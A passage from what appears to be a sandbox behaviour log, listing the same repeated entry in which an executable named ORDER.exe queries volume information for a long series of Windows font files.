                  Source: C:\Users\user\Desktop\ORDER.exeQueries volume information: C:\Windows\Fonts\consola.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\ORDER.exeQueries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\ORDER.exeQueries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\ORDER.exeQueries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\ORDER.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\ORDER.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\ORDER.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\ORDER.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\ORDER.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\ORDER.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\ORDER.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\ORDER.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\ORDER.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\ORDER.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\ORDER.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\ORDER.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\ORDER.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\ORDER.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\ORDER.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\ORDER.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\ORDER.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\ORDER.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\ORDER.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\ORDER.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\ORDER.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\ORDER.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\ORDER.exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\ORDER.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\ORDER.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\ORDER.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\ORDER.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\ORDER.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\ORDER.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\ORDER.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\ORDER.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\ORDER.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\ORDER.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\ORDER.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\ORDER.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\ORDER.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\ORDER.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\ORDER.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\ORDER.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\ORDER.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\ORDER.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\ORDER.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
                  Source: C:\Users\user\Desktop\ORDER.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
                  Source: C:\Users\user\Desktop\ORDER.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation
                  Source: C:\Users\user\Desktop\ORDER.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\ORDER.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\ORDER.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\ORDER.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\ORDER.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\ORDER.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\ORDER.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\ORDER.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
                  Source: C:\Users\user\Desktop\ORDER.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
                  Source: C:\Users\user\Desktop\ORDER.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation
                  Source: C:\Users\user\Desktop\ORDER.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\ORDER.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
                  Source: C:\Users\user\Desktop\ORDER.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\ORDER.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
                  Source: C:\Users\user\Desktop\ORDER.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\ORDER.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\ORDER.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\ORDER.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\ORDER.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\ORDER.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\ORDER.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\ORDER.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\ORDER.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\ORDER.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\ORDER.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\ORDER.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\ORDER.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\ORDER.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\ORDER.exeQueries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\ORDER.exeQueries volume information: C:\Windows\Fonts\seguisli.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\ORDER.exeQueries volume information: C:\Windows\Fonts\seguili.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\ORDER.exeQueries volume information: C:\Windows\Fonts\seguisbi.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\ORDER.exeQueries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\ORDER.exeQueries volume information: C:\Windows\Fonts\seguibl.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\ORDER.exeQueries volume information: C:\Windows\Fonts\seguibli.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\ORDER.exeQueries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\ORDER.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\ORDER.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\ORDER.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation
                  Source: C:\Users\user\Desktop\ORDER.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\ORDER.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
                  Source: C:\Users\user\Desktop\ORDER.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
                  Source: C:\Users\user\Desktop\ORDER.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
                  Source: C:\Users\user\Desktop\ORDER.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
                  Source: C:\Users\user\Desktop\ORDER.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\ORDER.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\ORDER.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\ORDER.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\ORDER.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\ORDER.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\ORDER.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\ORDER.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\ORDER.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\ORDER.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\ORDER.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\ORDER.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\ORDER.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\ORDER.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\ORDER.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\ORDER.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\ORDER.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\ORDER.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation
                  Source: C:\Users\user\Desktop\ORDER.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
                  Source: C:\Users\user\Desktop\ORDER.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation
                  Source: C:\Users\user\Desktop\ORDER.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation
                  Source: C:\Users\user\Desktop\ORDER.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\ORDER.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\ORDER.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\ORDER.exeQueries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\ORDER.exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\ORDER.exeQueries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\ORDER.exeQueries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\ORDER.exeQueries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\ORDER.exeQueries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\ORDER.exeQueries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\ORDER.exeQueries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\ORDER.exeQueries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\ORDER.exeQueries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\ORDER.exeQueries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\ORDER.exeQueries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\ORDER.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\ORDER.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\ORDER.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\ORDER.exeQueries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\ORDER.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\ORDER.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\ORDER.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\ORDER.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\ORDER.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\ORDER.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\ORDER.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\ORDER.exeQueries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\ORDER.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\ORDER.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\ORDER.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\ORDER.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\ORDER.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\ORDER.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\ORDER.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\ORDER.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\ORDER.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\ORDER.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\ORDER.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\ORDER.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\ORDER.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\ORDER.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\ORDER.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\ORDER.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\ORDER.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\ORDER.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\ORDER.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\ORDER.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\ORDER.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\ORDER.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\ORDER.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\ORDER.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\ORDER.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\ORDER.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\ORDER.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\ORDER.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\ORDER.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\ORDER.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\ORDER.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\ORDER.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\ORDER.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\ORDER.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\ORDER.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\ORDER.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\ORDER.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\ORDER.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\ORDER.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\ORDER.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\ORDER.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\ORDER.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\ORDER.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\ORDER.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\ORDER.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\ORDER.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\ORDER.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\ORDER.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\ORDER.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\ORDER.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\ORDER.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\ORDER.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\ORDER.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\ORDER.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\ORDER.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\ORDER.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\ORDER.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\ORDER.exeQueries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\ORDER.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\ORDER.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\ORDER.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\ORDER.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\ORDER.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\ORDER.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\ORDER.exeQueries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\ORDER.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\ORDER.exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\ORDER.exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\ORDER.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\ORDER.exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\ORDER.exeQueries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\ORDER.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\ORDER.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\ORDER.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\ORDER.exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\ORDER.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\ORDER.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\ORDER.exeQueries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\ORDER.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\ORDER.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\ORDER.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\ORDER.exeQueries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\ORDER.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\ORDER.exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\ORDER.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\ORDER.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\ORDER.exeQueries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\ORDER.exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\ORDER.exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\ORDER.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\ORDER.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\ORDER.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\ORDER.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\ORDER.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\ORDER.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\ORDER.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\ORDER.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\ORDER.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\ORDER.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\ORDER.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\ORDER.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\ORDER.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\ORDER.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\ORDER.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\ORDER.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\ORDER.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformation
